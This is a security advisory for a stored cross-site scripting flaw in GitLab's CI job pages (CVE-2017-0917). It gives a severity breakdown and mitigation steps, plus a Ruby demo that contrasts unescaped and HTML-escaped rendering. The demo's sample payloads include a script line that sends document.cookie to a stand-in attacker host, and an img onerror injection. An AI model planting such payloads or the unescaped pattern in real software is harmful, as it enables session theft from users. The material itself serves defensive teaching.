PT-2018-5144 · Gitlab · Gitlab Ce/Ee+1

Published: 2018-03-18 · Updated: 2019-10-09 · CVE-2017-0917

CVSS v3.1: 6.1 (Medium)
Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Name of the Vulnerable Software and Affected Versions: GitLab Community and Enterprise Editions, version 10.2.4 and earlier.

Description: The CI job component does not validate or neutralise attacker-controlled input before it is rendered in the web UI, resulting in persistent (stored) cross-site scripting. Once a payload has been saved with a job, it executes in the browser of every user who later views the affected job page, under the GitLab instance's origin. The CVSS vector spells out the consequences: no privileges are required to plant the payload (PR:N), a victim must open the page (UI:R), the impact lands in the victim's browser rather than in the vulnerable component itself (S:C), and the attacker obtains limited read and write capability in the victim's session (C:L/I:L), such as reading data visible to the victim or performing UI actions with the victim's privileges. Availability is not affected (A:N).

Recommendations: Upgrade to a GitLab release that contains the fix (one is available; Debian users should apply DSA-4145-1). Where an immediate upgrade is not possible, reduce exposure of the CI job component: limit who can create or modify CI jobs to trusted users through project membership and CI/CD settings, disable CI/CD (Pipelines) in projects that do not need it, and treat all job-supplied data (job names, job output) as untrusted until the patched version is deployed.
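As an added illustration (not GitLab's own code; GitLab is a Rails application with its own rendering pipeline, and the exact code path is not given here), the following Ruby script models the pattern the advisory describes beside its hardened form: attacker-controlled CI job data is stored once and then rendered into the job page for every later viewer, which is what makes the XSS persistent. The in-memory job store, the function names and the payload strings are assumptions constructed for the demonstration; the fix shown is HTML-escaping at the output boundary with Ruby's standard-library ERB::Util.html_escape.

```ruby
require "erb"

# Constructed attacker-controlled values standing in for data that a CI job
# carries into the web UI (a job name and a line of job output). These are
# sample payloads for the demonstration, not values from any real instance.
ATTACKER_JOB_NAME = %q{build <script>fetch("https://attacker.example/?c=" + document.cookie)</script>}
ATTACKER_JOB_LOG  = %q{Running build... <img src=x onerror="alert(document.domain)">}

# Assumed in-memory stand-in for the job store. The payload is written once
# (by the attacker) and served to every later viewer: that is what makes
# the XSS persistent rather than reflected.
JOBS = {}

def store_job(id, name:, log:)
  JOBS[id] = { name: name, log: log }
end

# Vulnerable pattern: untrusted fields are interpolated straight into HTML,
# so any tags they contain become live markup in the viewer's browser.
def job_page_vulnerable(id)
  job = JOBS.fetch(id)
  <<~HTML
    <h1 class="job-title">#{job[:name]}</h1>
    <pre class="job-log">#{job[:log]}</pre>
  HTML
end

# Hardened pattern: every untrusted field is HTML-escaped at the output
# boundary. ERB::Util.html_escape turns <, >, &, " and ' into entities, so the
# payload is displayed as text instead of being parsed as markup.
def esc(value)
  ERB::Util.html_escape(value.to_s)
end

def job_page_safe(id)
  job = JOBS.fetch(id)
  <<~HTML
    <h1 class="job-title">#{esc(job[:name])}</h1>
    <pre class="job-log">#{esc(job[:log])}</pre>
  HTML
end

# Narrow check used by the demo: did a tag from the sample payloads survive
# into the rendered page as real markup? Escaped output contains "&lt;script"
# rather than "<script", so it does not match. This only recognises the tag
# names used in the payloads above; it is not a general XSS detector.
def injected_tag?(html)
  html.match?(%r{<(script|img|svg|iframe)\b}i)
end

if __FILE__ == $PROGRAM_NAME
  store_job(42, name: ATTACKER_JOB_NAME, log: ATTACKER_JOB_LOG)
  puts "vulnerable page executes payload: #{injected_tag?(job_page_vulnerable(42))}"
  puts "hardened page executes payload:   #{injected_tag?(job_page_safe(42))}"
  puts job_page_safe(42)
end
```

The point of the split into store_job and the two page renderers is that the bug is not where the data enters (a job name is legitimately free-form text) but where it leaves: escaping must happen at the HTML boundary, for every untrusted field, on every page that renders it. Input validation alone cannot fix this class of issue because the same stored value may be rendered in several contexts.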

Fix

RCE

XSS

Weakness Enumeration

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Related Identifiers

CVE-2017-0917
DSA-4145-1

Affected Products

Gitlab
Gitlab Ce/Ee